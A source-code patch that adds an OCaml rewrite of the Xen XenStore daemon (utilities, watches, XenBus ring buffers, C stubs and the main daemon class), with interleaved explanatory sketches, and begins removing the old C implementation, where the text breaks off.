diff -r 10a8fae412c5 tools/xenstore/utils.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/utils.ml   Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,122 @@
+(* 
+    Utils for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* Print an error to standard output stream and die *)
+let barf str =
+  Printf.printf "FATAL: %s\n" str; flush stdout;
+  ignore (exit 1)
+
+(* Print an error to the error stream and die *)
+let barf_perror str =
+  Printf.eprintf "FATAL: %s\n" str; flush stderr;
+  ignore (exit 1)
+
+(* Convert a string of bytes into an int32 *)
+let bytes_to_int32 bytes =
+  let num_bytes = 4 in
+  (* Convert bytes to an int32 *)
+  let rec loop i n =
+    if i >= num_bytes
+    then n
+    else loop (succ i) (Int32.add (Int32.shift_left n 8) (Int32.of_int (int_of_char bytes.[(num_bytes - 1) - i])))
+  in
+  loop 0 Int32.zero
+
+(* Convert a string of bytes into an int *)
+let bytes_to_int bytes =
+  Int32.to_int (bytes_to_int32 bytes)
+
+let combine lst =
+  List.fold_left (fun rest i -> rest ^ i) Constants.null_string lst
+
+let combine_with_string lst str =
+  List.fold_left (fun rest i -> rest ^ i ^ str) Constants.null_string lst
+
+(* Convert an int32 into a string of bytes *)
+let int32_to_bytes num =
+  let num_bytes = 4 in
+  let bytes = String.create num_bytes in
+  let rec loop i n =
+    if i < num_bytes
+    then (
+      bytes.[i] <- char_of_int (Int32.to_int (Int32.logand 0xFFl n));
+      loop (succ i) (Int32.shift_right_logical n 8)
+    )
+  in
+  loop 0 num;
+  bytes
+
+(* Convert an int into a string of bytes *)
+let int_to_bytes num =
+  int32_to_bytes (Int32.of_int num)
+
+(* Null terminate a string *)
+let null_terminate str =
+  str ^ (String.make 1 Constants.null_char)
+
+(* Remove the last element from a list *)
+let remove_last list =
+  let length = pred (List.length list) in
+  let rec loop n = (if (n = length) then [] else (List.nth list n :: loop (succ n))) in
+  loop 0
+
+(* Clean a string up for output *)
+let sanitise_string str =
+  let replacement_string = String.make 1 ' ' in
+  let rec replace_nulls s =
+    try
+      let i = String.index s Constants.null_char in
+      (String.sub s 0 i) ^ replacement_string ^ (replace_nulls (String.sub s (succ i) ((String.length s) - (succ i))))
+    with Not_found -> s
+  in
+  replace_nulls str
+
+(* Split a string into a list of strings based on the specified character *)
+let split_on_char str char =
+  let rec split_loop s =
+    if (s = Constants.null_string) then []
+    else
+      try
+        let null_index = String.index s char in
+        String.sub s 0 null_index :: split_loop (String.sub s (succ null_index) ((String.length s) - (succ null_index)))
+      with Not_found -> [ s ] | Invalid_argument _ -> []
+  in
+  split_loop str
+
+(* Split a string into a list of strings based on the null character *)
+let split str =
+  split_on_char str Constants.null_char
+
+(* Strip the trailing null byte off a string, if there is one *)
+let strip_null str =
+  if String.length str = 0 then str
+  else
+    let last = pred (String.length str) in
+    if str.[last] = Constants.null_char then String.sub str 0 last else str
+
+(* Return whether a string contains another string *)
+let rec strstr s1 s2 =
+  try
+    let i = String.index s1 s2.[0] in
+    if String.length (String.sub s1 i ((String.length s1) - i)) < String.length s2
+    then false
+    else if String.sub s1 i (String.length s2) = s2
+    then true
+    else strstr (String.sub s1 (succ i) ((String.length s1) - (succ i))) s2
+  with Not_found -> false
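
The int32_to_bytes and bytes_to_int32 helpers above encode the value least-significant byte first (little-endian) and write into a string in place with String.create. Current OCaml releases treat strings as immutable, so the following is a minimal sketch of the same round trip using the standard Bytes module. It assumes OCaml 4.08 or later, where Bytes.set_int32_le and Bytes.get_int32_le are available. It is not part of the patch.

```ocaml
(* Sketch only: little-endian int32 <-> 4-byte string (OCaml >= 4.08). *)
let int32_to_bytes (num : int32) : string =
  let b = Bytes.create 4 in
  Bytes.set_int32_le b 0 num;
  Bytes.to_string b

(* Reads the first four bytes; shorter input raises Invalid_argument. *)
let bytes_to_int32 (s : string) : int32 =
  Bytes.get_int32_le (Bytes.of_string s) 0

let () =
  let encoded = int32_to_bytes 0x01020304l in
  (* The lowest byte comes first, matching the loop in the patch. *)
  assert (encoded = "\x04\x03\x02\x01");
  assert (bytes_to_int32 encoded = 0x01020304l)
```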
diff -r 10a8fae412c5 tools/xenstore/watch.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/watch.ml   Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,106 @@
+(* 
+    Watches for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+type t =
+  {
+    domain : Domain.domain;
+    path : string;
+    token : string;
+    relative : bool
+  }
+
+let make domain path token relative =
+  {
+    domain = domain;
+    path = path;
+    token = token;
+    relative = relative
+  }
+
+let equal watch1 watch2 =
+  watch1.domain#id = watch2.domain#id && watch1.token = watch2.token && watch1.path = watch2.path
+
+(* Fire a watch *)
+let fire_watch path recurse watch =
+  let relative_base_path = Store.domain_root ^ (string_of_int watch.domain#id) in
+  let relative_base_length = succ (String.length relative_base_path) in
+  if Store.is_child path watch.path
+  then
+    let watch_path =
+      if watch.relative
+      then String.sub path relative_base_length ((String.length path) - relative_base_length)
+      else path in
+    watch.domain#add_output_message (Message.event ((Utils.null_terminate watch_path) ^ (Utils.null_terminate watch.token)))
+  else if recurse && Store.is_child watch.path path
+  then
+    let watch_path =
+      if watch.relative
+      then String.sub watch.path relative_base_length ((String.length watch.path) - relative_base_length)
+      else watch.path in
+    watch.domain#add_output_message (Message.event ((Utils.null_terminate watch_path) ^ (Utils.null_terminate watch.token)))
+
+class watches =
+object(self)
+  val m_domain_watches = Hashtbl.create 16
+  val m_watches = Hashtbl.create 32
+  method private add_domain_watch watch =
+    let watches = try Hashtbl.find self#domain_watches watch.domain#id with Not_found -> [] in
+    Hashtbl.replace self#domain_watches watch.domain#id (watch :: watches)
+  method private domain_watches = m_domain_watches
+  method private remove_domain_watch watch =
+    let watches = try Hashtbl.find self#domain_watches watch.domain#id with Not_found -> [] in
+    Hashtbl.replace self#domain_watches watch.domain#id (List.filter (fun w -> not (equal watch w)) watches)
+  method private watches = m_watches
+  method add (watch : t) =
+    if Hashtbl.mem self#watches watch.path
+    then (
+      let path_watches = Hashtbl.find self#watches watch.path in
+      try ignore (List.find (equal watch) path_watches); false
+      with Not_found -> (
+            Hashtbl.replace self#watches watch.path (watch :: path_watches);
+            self#add_domain_watch watch;
+            true
+          )
+    )
+    else (
+      Hashtbl.add self#watches watch.path [ watch ];
+      self#add_domain_watch watch;
+      true
+    )
+  method fire_watches path in_transaction recursive =
+    if not in_transaction then Hashtbl.iter (fun _ watches -> List.iter (fire_watch path recursive) watches) self#watches
+  method num_watches_for_domain domain_id = try List.length (Hashtbl.find self#domain_watches domain_id) with Not_found -> 0
+  method remove (watch : t) =
+    if Hashtbl.mem self#watches watch.path
+    then (
+      let remaining_watches = List.filter (fun w -> not (equal watch w)) (Hashtbl.find self#watches watch.path) in
+      if List.length remaining_watches > 0
+      then Hashtbl.replace self#watches watch.path remaining_watches
+      else Hashtbl.remove self#watches watch.path;
+      self#remove_domain_watch watch;
+      true
+    )
+    else false
+  method remove_watches (domain : Domain.domain) =
+    if Hashtbl.mem self#domain_watches domain#id
+    then (
+      List.iter (fun watch -> if self#remove watch then Trace.destroy watch.domain#id "watch") (Hashtbl.find self#domain_watches domain#id);
+      Hashtbl.remove self#domain_watches domain#id;
+    )
+end
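
For relative watches, fire_watch above strips the domain's base path plus one separator before reporting the event. The following is a minimal sketch of that string arithmetic. Store.domain_root is not shown in this part of the patch, so the value "/local/domain/" is an assumption, and relative_path is a hypothetical name.

```ocaml
(* Assumed value; the patch takes this from Store.domain_root. *)
let domain_root = "/local/domain/"

(* Drop "<domain_root><id>" and the separator after it from [path]. *)
let relative_path domain_id path =
  let base = domain_root ^ string_of_int domain_id in
  let skip = succ (String.length base) in
  String.sub path skip (String.length path - skip)

let () =
  assert (relative_path 5 "/local/domain/5/device/vif" = "device/vif")
```

Under these assumptions, a path that is exactly the base path gives String.sub a negative length and raises Invalid_argument, so a caller may want to handle that case separately.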
diff -r 10a8fae412c5 tools/xenstore/xenbus.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/xenbus.ml  Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,102 @@
+(* 
+    XenBus for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+let ring_size = 1024
+
+type xenbus_t
+type ring_t
+type ring_index_t
+
+external init_req_cons : xenbus_t -> ring_index_t = "init_req_cons_c"
+external init_req_prod : xenbus_t -> ring_index_t = "init_req_prod_c"
+external init_req_ring : xenbus_t -> ring_t = "init_req_ring_c"
+external init_rsp_cons : xenbus_t -> ring_index_t = "init_rsp_cons_c"
+external init_rsp_prod : xenbus_t -> ring_index_t = "init_rsp_prod_c"
+external init_rsp_ring : xenbus_t -> ring_t = "init_rsp_ring_c"
+external read_ring : ring_t -> int -> string -> int -> int -> unit = "read_ring_c"
+external write_ring : ring_t -> int -> string -> int -> int -> unit = "write_ring_c"
+external get_index : ring_index_t -> int32 = "get_index_c"
+external set_index : ring_index_t -> int32 -> unit = "set_index_c"
+external mmap : int -> xenbus_t = "mmap_c"
+external map_foreign : int -> int -> int -> xenbus_t = "xc_map_foreign_range_c"
+external munmap : xenbus_t -> unit = "munmap_c"
+external mb : unit -> unit = "mb_c"
+
+(* Ring buffer *)
+class ring_buffer ring consumer producer =
+object (self)
+  val m_consumer = consumer
+  val m_producer = producer
+  val m_ring = ring
+  method private advance_consumer amount = set_index m_consumer (Int32.add self#consumer (Int32.of_int amount))
+  method private advance_producer amount = set_index m_producer (Int32.add self#producer (Int32.of_int amount))
+  method private check_indexes = self#diff <= ring_size
+  method private consumer = get_index m_consumer
+  method private diff = Int32.to_int (Int32.sub self#producer self#consumer)
+  method private mask_index index = (Int32.to_int index) land (pred ring_size)
+  method private producer = get_index m_producer
+  method private ring = m_ring
+  method private set_producer index = set_index m_producer index
+  method can_read = self#diff <> 0
+  method can_write = self#diff <> ring_size
+  method read buffer offset length =
+    let start = self#mask_index self#consumer
+    and diff = self#diff in
+    if not self#check_indexes then raise (Constants.Xs_error (Constants.EIO, "ring_buffer#read_ring", "could not check indexes"));
+    mb ();
+    let read_length = min (min diff length) (ring_size - start) in
+    read_ring self#ring start buffer offset read_length;
+    mb ();
+    self#advance_consumer read_length;
+    read_length
+  method write buffer offset length =
+    let start = self#mask_index self#producer
+    and diff = self#diff in
+    if not self#check_indexes then raise (Constants.Xs_error (Constants.EIO, "ring_buffer#write_ring", "could not check indexes"));
+    mb ();
+    let write_length = min (min (ring_size - diff) length) (ring_size - start) in
+    write_ring self#ring start buffer offset write_length;
+    mb ();
+    self#advance_producer write_length;
+    write_length
+end
+
+(* XenBus interface *)
+class xenbus_interface port xenbus =
+object (self)
+  inherit Interface.interface as super
+  val m_port = port
+  val m_request_ring = new ring_buffer (init_req_ring xenbus) (init_req_cons xenbus) (init_req_prod xenbus)
+  val m_response_ring = new ring_buffer (init_rsp_ring xenbus) (init_rsp_cons xenbus) (init_rsp_prod xenbus)
+  val m_xenbus = xenbus
+  method private port = m_port
+  method private request_ring = m_request_ring
+  method private response_ring = m_response_ring
+  method can_read = self#request_ring#can_read
+  method can_write = self#response_ring#can_write
+  method destroy = if Eventchan.unbind self#port then munmap m_xenbus
+  method read buffer offset length =
+    let bytes_read = self#request_ring#read buffer offset (min length (String.length buffer)) in
+    Eventchan.notify self#port;
+    bytes_read
+  method write buffer offset length =
+    let bytes_written = self#response_ring#write buffer offset (min length (String.length buffer)) in
+    Eventchan.notify self#port;
+    bytes_written
+end
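
The ring_buffer class above keeps free-running 32-bit producer and consumer indexes and masks them only when touching the ring. The following is a minimal, self-contained sketch of the length calculation done by its read and write methods, with the shared-memory access left out. The function names used, readable_chunk and writable_chunk are hypothetical; ring_size and mask_index mirror the patch.

```ocaml
let ring_size = 1024

(* Position inside the ring for a free-running index. *)
let mask_index (index : int32) : int =
  Int32.to_int index land (ring_size - 1)

(* Bytes currently in the ring. Int32.sub wraps modulo 2^32, so this
   stays correct after the indexes overflow. *)
let used ~producer ~consumer = Int32.to_int (Int32.sub producer consumer)

(* Largest contiguous read: limited by the data present, by the request,
   and by the distance to the end of the ring. *)
let readable_chunk ~producer ~consumer ~wanted =
  let start = mask_index consumer in
  min (min (used ~producer ~consumer) wanted) (ring_size - start)

(* Largest contiguous write: limited by the free space instead. *)
let writable_chunk ~producer ~consumer ~wanted =
  let start = mask_index producer in
  min (min (ring_size - used ~producer ~consumer) wanted) (ring_size - start)

let () =
  (* 100 bytes are queued, but only 24 fit before the end of the ring. *)
  assert (readable_chunk ~producer:1100l ~consumer:1000l ~wanted:200 = 24)
```

A caller that gets back fewer bytes than requested is expected to call again, which is how the wrap-around at the end of the ring is handled without a second copy.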
diff -r 10a8fae412c5 tools/xenstore/xenbus_c.c
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/xenbus_c.c Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,204 @@
+/*
+    XenBus C stubs for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*/
+
+#include <stdint.h>
+#include <stdio.h>
+#include <errno.h>
+#include <unistd.h>
+#include <sys/mman.h>
+
+#include <xenctrl.h>
+#include <xen/io/xs_wire.h>
+
+#include <caml/mlvalues.h>
+#include <caml/callback.h>
+#include <caml/memory.h>
+#include <caml/alloc.h>
+
+/* Memory barrier */
+value mb_c (value dummy)
+{
+       CAMLparam1 (dummy);
+
+    asm volatile ( "lock; addl $0,0(%%esp)" : : : "memory" );
+
+       CAMLreturn (Val_unit);
+}
+
+/* Map a file */
+value mmap_c (value fd_v)
+{
+       CAMLparam1 (fd_v);
+
+       int fd = Int_val (fd_v);
+       long pagesize = getpagesize();
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) mmap(NULL, pagesize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
+
+       CAMLreturn (rv);
+}
+
+/* Unmap a file */
+value munmap_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0);
+       long pagesize = getpagesize();
+
+       CAMLreturn (Val_int (munmap(intf, pagesize)));
+}
+
+/* Map a foreign page */
+value xc_map_foreign_range_c (value xc_handle_v, value domid_v, value mfn_v)
+{
+       CAMLparam3 (xc_handle_v, domid_v, mfn_v);
+
+       int xc_handle = Int_val (xc_handle_v);
+       long pagesize = getpagesize();
+       uint32_t domid = (uint32_t)(Int_val (domid_v));
+       unsigned long mfn = (unsigned long)(Int_val (mfn_v));
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) xc_map_foreign_range(xc_handle, domid, pagesize, PROT_READ|PROT_WRITE, mfn);
+
+       CAMLreturn (rv);
+}
+
+value get_index_c (value index_v)
+{
+       CAMLparam1 (index_v);
+
+       uint32_t i = *(uint32_t *)(Field (index_v, 0));
+
+       CAMLreturn (caml_copy_int32(i));
+}
+
+value set_index_c (value index_v, value val_v)
+{
+       CAMLparam2 (index_v, val_v);
+
+       uint32_t i = Int32_val (val_v);
+       *(uint32_t *)(Field (index_v, 0)) = i;
+
+       CAMLreturn (Val_unit);
+}
+
+value init_req_ring_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0);
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) &(intf->req);
+
+       CAMLreturn (rv);
+}
+
+value init_rsp_ring_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0);
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) &(intf->rsp);
+
+       CAMLreturn (rv);
+}
+
+value init_req_cons_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0);
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) &(intf->req_cons);
+
+       CAMLreturn (rv);
+}
+
+value init_req_prod_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0);
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) &(intf->req_prod);
+
+       CAMLreturn (rv);
+}
+
+value init_rsp_cons_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0);
+       value rv =  alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) &(intf->rsp_cons);
+
+       CAMLreturn (rv);
+}
+
+value init_rsp_prod_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0);
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) &(intf->rsp_prod);
+
+       CAMLreturn (rv);
+}
+
+/* Read from a ring buffer */
+value read_ring_c (value ring_v, value ring_ofs_v, value buff_v, value buff_ofs_v, value len_v)
+{
+       CAMLparam5 (ring_v, ring_ofs_v, buff_v, buff_ofs_v, len_v);
+
+       char *ring = (char *)(Field (ring_v, 0));
+       char *buff = String_val (buff_v);
+       int ring_ofs = Int_val (ring_ofs_v);
+       int buff_ofs = Int_val (buff_ofs_v);
+       int len = Int_val (len_v);
+       int i;
+
+       for (i = 0; i < len; i++) {
+               buff[buff_ofs + i] = ring[ring_ofs + i];
+       }
+
+       CAMLreturn (Val_unit);
+}
+
+/* Write to a ring buffer */
+value write_ring_c (value ring_v, value ring_ofs_v, value buff_v, value buff_ofs_v, value len_v)
+{
+       CAMLparam5 (ring_v, ring_ofs_v, buff_v, buff_ofs_v, len_v);
+
+       char *ring = (char *)(Field (ring_v, 0));
+       char *buff = String_val (buff_v);
+       int ring_ofs = Int_val (ring_ofs_v);
+       int buff_ofs = Int_val (buff_ofs_v);
+       int len = Int_val (len_v);
+       int i;
+
+       for (i = 0; i < len; i++) {
+               ring[ring_ofs + i] = buff[buff_ofs + i];
+       }
+
+       CAMLreturn (Val_unit);
+}
diff -r 10a8fae412c5 tools/xenstore/xenstored.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/xenstored.ml       Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,135 @@
+(* 
+    OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+let domxs_init id =
+  let port = Eventchan.bind_interdomain id (Os.get_xenbus_port ()) in
+  let interface = Os.map_xenbus port in
+  let connection = new Connection.connection interface in
+  Eventchan.notify port;
+  new Domain.domain id connection
+
+let domain_entry_change domains domain_entry =
+  if (domain_entry.Transaction.entries > 0)
+  then
+    for i = 1 to domain_entry.Transaction.entries do
+      domains#entry_incr domain_entry.Transaction.id
+    done
+  else if (domain_entry.Transaction.entries < 0)
+  then
+    for i = domain_entry.Transaction.entries to (- 1) do
+      domains#entry_decr domain_entry.Transaction.id
+    done
+
+class xenstored options store =
+object(self)
+  val m_domains = new Domain.domains
+  val m_options : Option.t = options
+  val m_permissions = new Permission.permissions
+  val m_transactions = new Transaction.transactions store
+  val m_store = store
+  val m_watches = new Watch.watches
+  val mutable m_virq_port = Constants.null_file_descr
+  initializer m_permissions#set [ (Permission.string_of_permission (Permission.make Permission.NONE 0)) ] store Store.root_path; self#initialise_store
+  method private store = m_store
+  method add_domain domain =
+    self#domains#add domain;
+    Trace.create domain#id "connection"
+  method add_watch (domain : Domain.domain) watch =
+    if not (Domain.is_unprivileged domain) || self#watches#num_watches_for_domain domain#id < self#options.Option.quota_num_watches_per_domain
+    then self#watches#add watch
+    else raise (Constants.Xs_error (Constants.E2BIG, "Xenstored.xenstored#add_watch", "Too many watches"))
+  method commit transaction =
+    try
+      List.iter (domain_entry_change self#domains) (self#transactions#domain_entries transaction);
+      Transaction.fire_watches self#watches (self#transactions#commit transaction);
+      true
+    with _ -> false
+  method domain_entry_count transaction (domain_id : int) =
+    let entries = try self#domains#entry_count transaction.Transaction.domain_id with Not_found -> 0 in
+    try
+      let transaction_entries = (List.find (fun entry -> entry.Transaction.id = transaction.Transaction.domain_id) (self#transactions#domain_entries transaction)).Transaction.entries in
+      transaction_entries + entries
+    with Not_found -> entries
+  method domain_entry_decr store transaction path =
+    let domain_id = (List.hd (self#permissions#get store path)).Permission.domain_id in
+    if Domain.is_unprivileged_id domain_id then
+      if transaction.Transaction.transaction_id <> 0l
+      then self#transactions#domain_entry_decr transaction domain_id
+      else self#domains#entry_decr domain_id
+  method domain_entry_incr store transaction path =
+    let domain_id = (List.hd (self#permissions#get store path)).Permission.domain_id in
+    if Domain.is_unprivileged_id domain_id then
+      if transaction.Transaction.transaction_id <> 0l
+      then (
+        self#transactions#domain_entry_incr transaction domain_id;
+        let entry_count = (List.find (fun entry -> entry.Transaction.id = domain_id) (self#transactions#domain_entries transaction)).Transaction.entries in
+        let entry_count_current = try self#domains#entry_count domain_id with Not_found -> 0 in
+        if entry_count + entry_count_current > self#options.Option.quota_num_entries_per_domain
+        then (
+          self#transactions#domain_entry_decr transaction domain_id;
+          raise (Constants.Xs_error (Constants.EINVAL, "Xenstored.xenstored#domain_entry_incr", path))
+        )
+      )
+      else (
+        self#domains#entry_incr domain_id;
+        let entry_count = self#domains#entry_count domain_id in
+        if entry_count > self#options.Option.quota_num_entries_per_domain
+        then (
+          self#domains#entry_decr domain_id;
+          raise (Constants.Xs_error (Constants.EINVAL, "Xenstored.xenstored#domain_entry_incr", path))
+        )
+      )
+  method domains = m_domains
+  method initialise_domains =
+    if self#options.Option.domain_init
+    then (
+      if Domain.xc_handle = Constants.null_file_descr then Utils.barf_perror "Failed to open connection to hypervisor\n";
+      Eventchan.init ();
+      let dom0 =
+        if self#options.Option.separate_domain
+        then (
+          self#add_domain (domxs_init (Os.get_domxs_id ()));
+          Domain.domu_init 0 (Os.get_dom0_port ()) (Os.get_dom0_mfn ()) true
+        )
+        else domxs_init 0 in
+      m_virq_port <- Eventchan.bind_virq Constants.virq_dom_exc;
+      if m_virq_port = Constants.null_file_descr then Utils.barf_perror "Failed to bind to domain exception virq port\n";
+      self#add_domain dom0;
+      Eventchan.get_channel ()
+    )
+    else Constants.null_file_descr
+  method initialise_store =
+    let path = Store.root_path ^ "tool" ^ Store.dividor_str ^ "xenstored" in
+    self#store#create_node path;
+    self#permissions#add self#store path 0
+  method new_transaction domain store =
+    if not (Domain.is_unprivileged domain) || self#transactions#num_transactions_for_domain domain#id < self#options.Option.quota_max_transaction
+    then self#transactions#new_transaction domain store
+    else raise (Constants.Xs_error (Constants.ENOSPC, "Xenstored.xenstored#new_transaction", "Too many transactions"))
+  method options = m_options
+  method permissions = m_permissions
+  method remove_domain domain =
+    self#domains#remove domain;
+    Trace.destroy domain#id "connection";
+    self#watches#remove_watches domain;
+    self#transactions#remove_domain domain
+  method transactions = m_transactions
+  method virq_port = m_virq_port
+  method watches = m_watches
+end
diff -r 10a8fae412c5 tools/xenstore/xenstored_core.c
--- a/tools/xenstore/xenstored_core.c   Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,1987 +0,0 @@
-/* 
-    Simple prototype Xen Store Daemon providing simple tree-like database.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <sys/socket.h>
-#include <sys/select.h>
-#include <sys/un.h>
-#include <sys/time.h>
-#include <time.h>
-#include <unistd.h>
-#include <fcntl.h>
-#include <stdbool.h>
-#include <stdio.h>
-#include <stdarg.h>
-#include <stdlib.h>
-#include <syslog.h>
-#include <string.h>
-#include <errno.h>
-#include <dirent.h>
-#include <getopt.h>
-#include <signal.h>
-#include <assert.h>
-#include <setjmp.h>
-
-#include "utils.h"
-#include "list.h"
-#include "talloc.h"
-#include "xs_lib.h"
-#include "xenstored_core.h"
-#include "xenstored_watch.h"
-#include "xenstored_transaction.h"
-#include "xenstored_domain.h"
-#include "xenctrl.h"
-#include "tdb.h"
-
-#include "hashtable.h"
-
-extern int xce_handle; /* in xenstored_domain.c */
-
-static bool verbose = false;
-LIST_HEAD(connections);
-static int tracefd = -1;
-static bool recovery = true;
-static bool remove_local = true;
-static int reopen_log_pipe[2];
-static char *tracefile = NULL;
-static TDB_CONTEXT *tdb_ctx;
-
-static void corrupt(struct connection *conn, const char *fmt, ...);
-static void check_store(void);
-
-#define log(...)                                                       \
-       do {                                                            \
-               char *s = talloc_asprintf(NULL, __VA_ARGS__);           \
-               trace("%s\n", s);                                       \
-               syslog(LOG_ERR, "%s",  s);                              \
-               talloc_free(s);                                         \
-       } while (0)
-
-
-int quota_nb_entry_per_domain = 1000;
-int quota_nb_watch_per_domain = 128;
-int quota_max_entry_size = 2048; /* 2K */
-int quota_max_transaction = 10;
-
-TDB_CONTEXT *tdb_context(struct connection *conn)
-{
-       /* conn = NULL used in manual_node at setup. */
-       if (!conn || !conn->transaction)
-               return tdb_ctx;
-       return tdb_transaction_context(conn->transaction);
-}
-
-bool replace_tdb(const char *newname, TDB_CONTEXT *newtdb)
-{
-       if (rename(newname, xs_daemon_tdb()) != 0)
-               return false;
-       tdb_close(tdb_ctx);
-       tdb_ctx = talloc_steal(talloc_autofree_context(), newtdb);
-       return true;
-}
-
-static char *sockmsg_string(enum xsd_sockmsg_type type)
-{
-       switch (type) {
-       case XS_DEBUG: return "DEBUG";
-       case XS_DIRECTORY: return "DIRECTORY";
-       case XS_READ: return "READ";
-       case XS_GET_PERMS: return "GET_PERMS";
-       case XS_WATCH: return "WATCH";
-       case XS_UNWATCH: return "UNWATCH";
-       case XS_TRANSACTION_START: return "TRANSACTION_START";
-       case XS_TRANSACTION_END: return "TRANSACTION_END";
-       case XS_INTRODUCE: return "INTRODUCE";
-       case XS_RELEASE: return "RELEASE";
-       case XS_GET_DOMAIN_PATH: return "GET_DOMAIN_PATH";
-       case XS_WRITE: return "WRITE";
-       case XS_MKDIR: return "MKDIR";
-       case XS_RM: return "RM";
-       case XS_SET_PERMS: return "SET_PERMS";
-       case XS_WATCH_EVENT: return "WATCH_EVENT";
-       case XS_ERROR: return "ERROR";
